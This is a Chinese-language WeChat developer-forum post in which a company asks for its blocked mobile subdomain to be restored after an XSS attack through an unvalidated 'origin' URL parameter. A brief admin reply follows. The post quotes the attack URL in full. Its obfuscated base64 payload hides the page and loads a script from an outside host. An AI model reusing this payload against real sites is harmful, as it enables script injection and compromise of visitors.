小程序
小游戏
企业微信
微信支付
扫描小程序码分享
管理员:
您好,我们公司官网的域名因为跟踪参数origin没校验被人用XSS漏洞恶意攻击。
现域名cifnews域名底下二级域名m.cifnew.com的被封。公司已连夜修复完漏洞。
公司是中国跨境电商领域的流量入口,在全球10多亿个网站中的排名为4000多名。现在处于疫情的紧急情况下,公司开展了跨境行业的战疫情,助力疫情等主题和活动, 而微信是公司一个重要的用户链接口,对公司影响非常大,希望能尽快解封,对应微信上的申请恢复访问的请求也已提交。
谢谢。
导致被封的链接如下:
https://m.cifnews.com/form/3659?origin=lunbo1234abce"})}}});new Function(atob(`ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7di5zcmM9Ii8vejIuZHVveGouY29tL3giO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQodik7dGhyb3cgMA==`))();new Vue({methods:{handle(d){axios.post("",{origin:"&ek=U2FsdGVkX1+lN7WjyoGFXMwqYyg/q2xC+SmfD3PpogN6SVO4YaIiVJtgtqdzjsG9B+Sd8Qi/Kt1xZzE/k5kdgw==&money=17785#1581427059155
1 个回答
加粗
标红
插入代码
插入链接
插入图片
上传视频
你好,域名cifnew.com 可在微信正常访问,未被拦截,知悉。
你好,麻烦通过点击下方“反馈信息”按钮,提供出现问题的。
关注后,可在微信内接收相应的重要提醒。
请使用微信扫描二维码关注 “微信开放社区” 公众号
你好,域名cifnew.com 可在微信正常访问,未被拦截,知悉。